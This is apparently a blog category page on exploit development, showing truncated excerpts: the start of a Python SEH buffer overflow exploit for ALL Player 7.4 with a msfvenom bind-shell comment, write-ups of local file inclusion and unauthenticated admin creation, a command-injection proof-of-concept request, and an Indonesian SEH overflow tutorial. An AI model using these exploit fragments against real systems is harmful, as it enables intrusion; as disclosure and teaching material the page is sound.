Category: Exploits Development

#!/usr/bin/python # Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode) # Version: 7.4 # Date: 15-08-2017 # Exploit Author: f3ci # Tested on: Windows 7 SP1 x86 head = “http://” seh = “\x0f\x47” #0x0047000f nseh = “\x61\x41” #popad align junk = “\x41” * 301 junk2 = “\x41” * 45 #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e […]

Local File Inclusion ———————————————- Normal Request: We can download another file with change the value on filename parameter and we can send this request without login. Example: Add User Account with Admin Privilege without Login ———————————————- We can create user and give admin privilege to user which we have made without login. Because this app […]

Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Vulnerable Menu: Tools – Ping Proof of Concept: POST /u/jsp/tools/exec.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, […]

Kali ini saya akan coba tehnik lain dari stack overflow, yaitu stack overflow berbasis SEH. Apa itu SEH? silakan dibaca diliteratur-literatur berikut: Structured Exception Handling Win32 Exception handling for assembler programmers Tidak ada yang lebih menyenangkan daripada belajar sambil mencoba. Kita akan mencoba SEH based stack overflow pada program yang pernah di post oleh sickness, […]